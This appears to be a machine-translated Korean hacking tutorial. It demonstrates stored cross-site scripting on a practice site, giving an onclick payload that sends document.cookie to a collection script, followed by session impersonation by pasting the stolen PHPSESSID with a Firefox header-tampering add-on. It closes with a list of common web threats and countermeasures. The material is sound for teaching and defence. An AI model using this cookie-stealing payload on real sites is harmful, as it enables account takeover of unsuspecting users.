웹사이트를 해킹하는 방법? 일반적인 사이트 해킹 기술

작성자 : 올리버 존스 올리버 존스
Hours 업데이트

웹사이트 해킹 기술

그 어느 때보다 더 많은 사람들이 인터넷에 접속할 수 있게 되었습니다. 이로 인해 많은 조직에서는 사용자가 조직과 상호 작용하기 위해 온라인으로 사용할 수 있는 웹 기반 애플리케이션을 개발하게 되었습니다. 잘못 작성된 웹 애플리케이션 코드를 악용하여 중요한 데이터 및 웹 서버에 대한 무단 액세스를 얻을 수 있습니다.

이 튜토리얼에서는 웹 사이트를 해킹하는 방법을 배우고 다음을 소개합니다. 웹 애플리케이션 해킹 기법 및 대응방안 그러한 공격으로부터 보호하기 위해 배치할 수 있습니다.

웹사이트를 해킹하는 방법

이 웹사이트 해킹 실제 시나리오에서는 다음 위치에 있는 웹 애플리케이션의 사용자 세션을 하이재킹하겠습니다. www.techpanda.org. 우리는 크로스 사이트 스크립팅을 사용하여 쿠키 세션 ID를 읽은 다음 이를 사용하여 합법적인 사용자 세션을 가장합니다.

공격자가 웹 애플리케이션에 접근할 수 있고 동일한 애플리케이션을 사용하는 다른 사용자의 세션을 가로채기를 원한다고 가정합니다. 이 공격의 목표는 공격자의 액세스 계정이 제한되어 있다고 가정하고 웹 애플리케이션에 대한 관리자 액세스 권한을 얻는 것일 수 있습니다.

단계 1) URL 열기 http://www.techpanda.org/.

연습 목적으로는 SQL Injection을 사용하여 액세스하는 것이 강력히 권장됩니다. 이 내용을 참조하세요. 기사 방법에 대한 자세한 내용은

단계 2) 로그인 정보를 입력하세요.

로그인 이메일은 admin@google.com, 비밀번호는 Password2010입니다.

단계 3) 대시보드를 확인하세요.

성공적으로 로그인했다면 다음 대시보드가 ​​나타납니다.

웹사이트 해킹

단계 4) 새 콘텐츠를 입력하세요.

새 연락처 추가를 클릭하고 다음을 이름으로 입력하세요. 

<a href=# onclick=\"document.location=\'http://techpanda.org/snatch_sess_id.php?c=\'+escape\(document.cookie\)\;\">Dark</a>

단계 5) 추가 Javascript.

위의 코드는 Java스크립트. onclick 이벤트에 하이퍼링크를 추가합니다.. 의심하지 않는 사용자가 링크를 클릭하면 이벤트가 PHP 쿠키 세션 ID를 전송하고 snatch_sess_id.php URL의 세션 ID와 함께 페이지

웹사이트 해킹

단계 6) 자세한 내용을 추가하세요.

아래에 표시된 대로 나머지 세부 정보를 입력하고 변경 사항 저장을 클릭하세요.

웹사이트 해킹

단계 7) 대시보드를 확인하세요.

이제 대시보드가 ​​다음 화면과 같이 표시됩니다.

웹사이트 해킹

단계 8) 세션 ID를 확인하세요.

  • 크로스 사이트 스크립트 코드는 데이터베이스에 저장되므로 액세스 권한이 있는 사용자가 로그인할 때마다 로드됩니다.
  • 관리자가 로그인하여 Dark라는 하이퍼링크를 클릭한다고 가정해 보겠습니다.
  • URL에 세션 ID가 표시되는 창을 받게 됩니다.

    • 웹사이트 해킹

    주의 사항: 스크립트는 PHPSESSID가 저장된 일부 원격 서버로 값을 보낸 다음 사용자가 아무 일도 일어나지 않은 것처럼 웹 사이트로 다시 리디렉션될 수 있습니다.

    주의 사항: 얻는 값은 이 웹페이지의 값과 다를 수 있습니다. 해킹 튜토리얼, 하지만 개념은 동일합니다.

    다음을 사용한 세션 가장 Firefox 및 변조 데이터 추가 기능

    아래 순서도는 이 연습을 완료하기 위해 수행해야 하는 단계를 보여줍니다.

    다음을 사용한 세션 가장 Firefox 및 변조 데이터 추가 기능

    • 당신이 필요합니다 Firefox 이 섹션의 웹 브라우저 및 Tamper Data 추가 기능
    • 엽니다 Firefox 아래 다이어그램과 같이 추가 기능을 설치하십시오.

    다음을 사용한 세션 가장 Firefox 및 변조 데이터 추가 기능

    다음을 사용한 세션 가장 Firefox 및 변조 데이터 추가 기능

    • 변조 데이터를 검색한 후 위와 같이 설치를 클릭합니다.

    다음을 사용한 세션 가장 Firefox 및 변조 데이터 추가 기능

    • 동의 및 설치…를 클릭하세요.

    다음을 사용한 세션 가장 Firefox 및 변조 데이터 추가 기능

    다음을 사용한 세션 가장 Firefox 및 변조 데이터 추가 기능

    • 설치가 완료되면 지금 다시 시작을 클릭하세요
    • 메뉴 표시줄을 활성화합니다. Firefox 표시되지 않으면

    다음을 사용한 세션 가장 Firefox 및 변조 데이터 추가 기능

    • 도구 메뉴를 클릭한 후 아래와 같이 Tamper Data를 선택합니다.

    다음을 사용한 세션 가장 Firefox 및 변조 데이터 추가 기능

    • 다음 창이 나타납니다. 참고: Windows 비어 있지 않으면 지우기 버튼을 누르십시오

    다음을 사용한 세션 가장 Firefox 및 변조 데이터 추가 기능

    • 탬퍼 시작 메뉴를 클릭하세요.
    • 다시 전환 Firefox 웹 브라우저, 유형 http://www.techpanda.org/dashboard.php 그런 다음 Enter 키를 눌러 페이지를 로드하세요.
    • Tamper Data에서 다음 팝업이 표시됩니다.

    다음을 사용한 세션 가장 Firefox 및 변조 데이터 추가 기능

    • 팝업 창에는 세 가지 옵션이 있습니다. Tamper 옵션을 사용하면 HTTP 헤더 정보가 서버에 제출되기 전에 수정할 수 있습니다..
    • 그것을 클릭
    • 다음 창이 나타납니다.

    다음을 사용한 세션 가장 Firefox 및 변조 데이터 추가 기능

    • 복사 PHP 세션 ID 공격 URL에서 복사하여 등호 뒤에 붙여넣습니다. 이제 귀하의 가치는 다음과 같습니다
    PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2
    • 확인 버튼을 클릭하세요
    • Tamper data 팝업 창이 다시 나타납니다.

    다음을 사용한 세션 가장 Firefox 및 변조 데이터 추가 기능

    • 계속해서 변조하시겠습니까?라는 질문에 대한 체크박스의 선택을 취소하세요.
    • 완료되면 제출 버튼을 클릭하세요
    • 아래와 같이 대시보드를 볼 수 있어야 합니다.

    다음을 사용한 세션 가장 Firefox 및 변조 데이터 추가 기능

    주의 사항: 로그인하지 않았습니다. 크로스 사이트 스크립팅을 사용하여 검색한 PHPSESSID 값을 사용하여 로그인 세션을 가장했습니다.

    관련 기사

    웹 애플리케이션이란 무엇입니까? 웹 위협이란 무엇입니까?

    웹 애플리케이션(웹 사이트라고도 함)은 클라이언트-서버 모델을 기반으로 하는 애플리케이션입니다. 그만큼 섬기는 사람 데이터베이스 액세스 및 비즈니스 로직을 제공합니다. 웹 서버에서 호스팅됩니다. 클라이언트 애플리케이션은 클라이언트 웹 브라우저에서 실행됩니다. 웹 애플리케이션은 일반적으로 다음과 같은 언어로 작성됩니다. Java, C# 및 VB.Net, PHP, ColdFusion Markup Language 등 웹 애플리케이션에 사용되는 데이터베이스 엔진에는 다음이 포함됩니다. MySQL, MS SQL 서버, PostgreSQL, SQLite등

    최고의 웹사이트 해킹 기술

    대부분의 웹 애플리케이션은 인터넷을 통해 접근할 수 있는 공개 서버에 호스팅됩니다. 이는 쉽게 접근할 수 있기 때문에 공격에 취약하게 만듭니다. 다음은 일반적인 웹 애플리케이션 위협입니다.

    • SQL 주입 – 이 위협의 목표는 로그인 알고리즘을 우회하고 데이터를 파괴하는 것일 수 있습니다.
    • 서비스 거부 공격– 이 위협의 목표는 합법적인 사용자의 리소스 액세스를 거부하는 것일 수 있습니다.
    • 크로스 사이트 스크립팅 XSS– 이 위협의 목표는 클라이언트 측 브라우저에서 실행될 수 있는 코드를 삽입하는 것일 수 있습니다.
    • 쿠키/세션 중독– 이 위협의 목표는 공격자가 쿠키/세션 데이터를 수정하여 무단 액세스를 얻는 것입니다.
    • 양식 변조 – 이 위협의 목표는 공격자가 할인된 가격으로 품목을 얻을 수 있도록 전자 상거래 애플리케이션의 가격과 같은 양식 데이터를 수정하는 것입니다.
    • 코드 삽입 – 이 위협의 목표는 PHP와 같은 코드를 주입하는 것입니다. Python, 등 서버에서 실행될 수 있습니다. 이 코드는 백도어를 설치하고 민감한 정보를 공개하는 등의 작업을 수행할 수 있습니다.
    • 방어– 이 위협의 목표는 웹사이트에 표시된 페이지를 수정하고 모든 페이지 요청을 공격자의 메시지가 포함된 단일 페이지로 리디렉션하는 것입니다.

    해킹으로부터 웹사이트를 보호하는 방법은 무엇입니까?

    조직은 웹 서버 공격으로부터 자신을 보호하기 위해 다음 정책을 채택할 수 있습니다.

    • SQL 주입 – 처리를 위해 데이터베이스에 사용자 매개변수를 제출하기 전에 사용자 매개변수를 삭제하고 검증하면 공격을 받을 가능성을 줄이는 데 도움이 될 수 있습니다. SQL 주입. MS SQL Server와 같은 데이터베이스 엔진, MySQL등은 매개변수와 준비된 명령문을 지원합니다. 기존 SQL 문보다 훨씬 안전합니다.
    • 서비스 거부 공격 – 공격이 단순한 DoS인 경우 방화벽을 사용하여 의심스러운 IP 주소의 트래픽을 삭제할 수 있습니다. 네트워크와 침입 탐지 시스템을 적절하게 구성하면 침입 가능성을 줄이는 데도 도움이 될 수 있습니다. DoS 공격 성공했습니다.
    • 크로스 사이트 스크립팅 – 헤더, URL을 통해 전달된 매개변수, 양식 매개변수 및 숨겨진 값을 검증하고 삭제하면 XSS 공격을 줄이는 데 도움이 될 수 있습니다.
    • 쿠키/세션 중독 – 이는 쿠키 내용을 암호화하고, 일정 시간이 지난 후 쿠키 시간을 초과하고, 쿠키를 생성하는 데 사용된 클라이언트 IP 주소와 연결함으로써 이를 방지할 수 있습니다.
    • 양식 강화 - 이는 사용자 입력을 처리하기 전에 유효성을 검사하고 확인함으로써 방지할 수 있습니다.
    • 코드 주입 - 이는 모든 매개변수를 실행 코드가 아닌 데이터로 처리하여 방지할 수 있습니다. 이를 구현하기 위해 삭제 및 유효성 검사를 사용할 수 있습니다.
    • 훼손 – 좋은 웹 애플리케이션 개발 보안 정책은 웹 서버에 접근하기 위해 일반적으로 사용되는 취약점. 이는 웹 애플리케이션을 개발할 때 운영 체제, 웹 서버 소프트웨어 및 최상의 보안 관행을 적절히 구성하는 것이 될 수 있습니다.
    이 옵션을 선택합니다 : 링크가 맬웨어로부터 안전한지 확인하는 최고의 URL 스캐너 9가지

    제품 개요

    • 웹 애플리케이션은 서버-클라이언트 모델을 기반으로 합니다. 클라이언트 측은 웹 브라우저를 사용하여 서버의 리소스에 액세스합니다.
    • 웹 애플리케이션은 일반적으로 인터넷을 통해 액세스할 수 있습니다. 이로 인해 공격에 취약해집니다.
    • 웹 애플리케이션 위협에는 SQL 주입, 코드 주입, XSS, 훼손, 쿠키 중독 등이 포함됩니다.
    • 웹 애플리케이션을 개발할 때 좋은 보안 정책을 사용하면 보안을 강화하는 데 도움이 될 수 있습니다.